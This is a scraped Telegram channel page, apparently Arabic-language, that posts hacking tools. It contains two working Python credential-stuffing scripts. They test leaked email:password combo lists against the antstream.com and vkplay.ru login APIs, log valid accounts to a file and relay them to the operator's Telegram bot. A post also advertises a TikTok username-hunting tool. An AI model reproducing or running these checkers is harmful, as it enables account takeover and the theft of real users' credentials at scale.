Арабский питон
Ir al canal en Telegram
Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!
Mostrar más1 774
Suscriptores
-3824 horas
-2367 días
-1 14730 días
Archivo de publicaciones
1 772
import requests,json,random,time,os
from concurrent.futures import ThreadPoolExecutor,as_completed
b_t=input('tok : ')
c_i=input('id : ')
u_l="https://api.antstream.com/auth/aos/login"
def s_m(m):
url=f"https://api.telegram.org/bot{b_t}/sendMessage"
d={"chat_id":c_i,"text":m,"parse_mode":"HTML"}
try:requests.post(url,data=d)
except:pass
def c_k(l):
try:
e,p=l.strip().split(":",1)
p_d={"email":e,"password":p,"platform":"web"}
h_d={
'User-Agent':"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36",
'Content-Type':"application/json",
'origin':"https://accounts.antstream.com",
'referer':"https://accounts.antstream.com/"
}
r=requests.post(u_l,json=p_d,headers=h_d)
if "accessToken" in r.text:
t_d=r.json()
print(f"HIT : {e}:{p}")
tk=t_d['data']['accessToken']['token'][:50]+"..."
msg=f"HIT\n {e}\n {p}"
s_m(msg)
with open("hits.txt","a")as f:f.write(f"{e}:{p}\n")
else:
print(f"BAD : {e}:{p}")
except:
print(f"ERR {l}")
def m():
try:
with open("antstream_com_email.txt","r")as f:L=f.read().splitlines()
except:print("no combo");return
with ThreadPoolExecutor(max_workers=30)as e:
f_t=[e.submit(c_k,l) for l in L]
for f in as_completed(f_t):
pass
if __name__=="__main__":m()
شي/كر على برنامج
antstream1 772
من بارحه اليوم اتواصل ويه كوكل و بأخير لا محصل فلوسي و لا محصل الاشتراك على الأقل استعمله اسوي بي فيديوهات
1 772
import requests,json,re,time,threading
tk=input("Enter Telegram Token: ")
ci=input("Enter Chat ID: ")
cf=input("Enter Combo File: ")
ht=0
bd=0
lk=threading.Lock()
def st(mg):
if tk and ci:
try:
requests.post(f"https://api.telegram.org/bot{tk}/sendMessage",json={'chat_id':ci,'text':mg},timeout=5)
except:pass
def ck(em,pw):
global ht,bd
try:
u1="https://auth-ac.vkplay.ru/api/v3/pub/auth/init"
p1={"login":em,"continue":"https://vkplay.ru/","failure":"https://account.vkplay.ru/login/"}
h1={'User-Agent':"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36",'Accept-Encoding':"gzip, deflate, br, zstd",'Content-Type':"application/json",'sec-ch-ua-platform':'"Android"','sec-ch-ua':'"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"','sec-ch-ua-mobile':"?1",'origin':"https://account.vkplay.ru",'sec-fetch-site':"same-site",'sec-fetch-mode':"cors",'sec-fetch-dest':"empty",'referer':"https://account.vkplay.ru/",'accept-language':"ar-IQ,ar;q=0.9,en-IQ;q=0.8,en;q=0.7,en-US;q=0.6",'priority':"u=1, i"}
ss=requests.Session()
r1=ss.post(u1,json=p1,headers=h1,timeout=15)
tn=None
cs=None
try:
d1=r1.json()
tn=d1.get("token")
cs=d1.get("csrfmiddlewaretoken")
except:
mt=re.search(r'"token":"([^"]+)"',r1.text)
mc=re.search(r'"csrfmiddlewaretoken":"([^"]+)"',r1.text)
if mt:tn=mt.group(1)
if mc:cs=mc.group(1)
if not tn:
with lk:bd+=1
print(f"BAD {em}:{pw}")
return
time.sleep(1)
u2="https://auth-ac.vkplay.ru/api/v3/pub/auth/verify"
p2={"login":em,"token":tn,"password":pw}
if cs:p2["csrfmiddlewaretoken"]=cs
h2={'User-Agent':"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Mobile Safari/537.36",'Accept-Encoding':"gzip, deflate, br, zstd",'Content-Type':"application/json",'sec-ch-ua-platform':'"Android"','sec-ch-ua':'"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"','sec-ch-ua-mobile':"?1",'origin':"https://account.vkplay.ru",'sec-fetch-site':"same-site",'sec-fetch-mode':"cors",'sec-fetch-dest':"empty",'referer':"https://account.vkplay.ru/",'accept-language':"ar-IQ,ar;q=0.9,en-IQ;q=0.8,en;q=0.7,en-US;q=0.6",'priority':"u=1, i"}
r2=ss.post(u2,json=p2,headers=h2,timeout=15)
try:
d2=r2.json()
if "auth_redirect"in d2:
ar=d2["auth_redirect"]
ui=re.search(r'user_id=(\d+)',ar)
if ui:
with lk:ht+=1
rs=f"HIT\nEmail: {em}\nPassword: {pw}\nUserID: {ui.group(1)}"
print(rs)
with open('hits.txt','a')as f:f.write(f"{em}:{pw}|{ui.group(1)}\n")
st(rs)
else:
with lk:ht+=1
rs=f"HIT\nEmail: {em}\nPassword: {pw}"
print(rs)
with open('hits.txt','a')as f:f.write(f"{em}:{pw}\n")
st(rs)
else:
with lk:bd+=1
print(f"BAD {em}:{pw}")
except:
with lk:bd+=1
print(f"BAD {em}:{pw}")
except:
with lk:bd+=1
print(f"ERROR {em}:{pw}")
try:
with open(cf,'r')as f:cb=f.read().splitlines()
except:
print("File not found")
exit()
th=[]
for cm in cb:
if':'in cm:
em,pw=cm.split(':',1)
t=threading.Thread(target=ck,args=(em.strip(),pw.strip()))
t.start()
th.append(t)
if len(th)>=10:
for t in th:t.join()
th=[]
for t in th:t.join()1 772
اداه صيد يوزرات تيك توك رباعي وغير رباعي يعني مميز
طريقه التشغيل
•~ تخلي ايديك
•~ تخلي توكنك
•~انوب تختار 1or2
•~رقم واحد عشوائي ومميز
•~رقم 2 فقط رباعي ويطول بل صيد بس يصيد متاح وغير مسحوب
وبس مبرمج الاداه | جنرال
DEV•.•.~ @r_9he
progremmr •.•.•.~ JNRAL
دزو صور الصيد علمود احدثها الكم
A tool for hunting TikTok usernames (four-letter and non-four-letter, meaning unique). How to use it: • Enter your hand • Enter your token • Then choose 1 or 2 • One random and unique number • The second number is only four-letter and takes a long time to hunt, but it only hunts available and unswiped users. Tool programmed by: General DEV • @r_9he progremmr • JNRAL. Send me pictures of the hunts so I can update it for you.
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
